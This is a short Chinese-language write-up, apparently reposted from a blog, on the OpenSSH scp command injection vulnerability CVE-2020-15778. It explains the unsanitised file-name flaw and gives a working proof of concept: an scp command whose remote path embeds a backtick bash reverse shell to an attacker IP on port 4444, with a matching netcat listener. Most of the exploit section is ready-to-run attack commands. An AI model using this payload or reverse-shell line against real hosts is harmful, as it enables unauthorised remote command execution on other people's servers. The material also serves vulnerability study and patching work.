影响版本:OpenSSH =< 8.3p1
scp 是 secure copy 的缩写。在linux系统中,scp用于linux之间复制文件和目录,基于 ssh 登陆进行安全的远程文件拷贝命令。该命令由openssh的scp.c及其他相关代码实现。
poc利用:
在向远程主机拷贝文件时,文件的路径会追加到本地scp命令后,当执行本地scp命令时,scp不会检查、过滤和清除文件名。这使得攻击者执行带有反引号的有效scp命令时,本地shell还将执行反引号中的命令。
查看OpenSSH的版本
ssh -V
反弹shell:
kali:192.168.1.111
openssh主机:192.168.1.194
scp zwish.php root@192.168.1.194:‘`bash -i >& /dev/tcp/192.168.1.111/4444 0>&1`‘
kali监听:nc -lvp 4444
比较鸡肋的是需要知道登录的ssh用户的密码。
这里尝试禁止某个ssh用户远程登录,但他必须经过密码的身份验证才能反弹shell,所以可利用的场景实在是想不到
1、网上搜资料说可以在authorized_key文件可以设置允许SCP单不允许SSH实际登陆
2、可能会用在回弹shell
OpenSSH的scp命令注入漏洞(CVE-2020-15778)
原文:https://www.cnblogs.com/zw1sh/p/13823190.html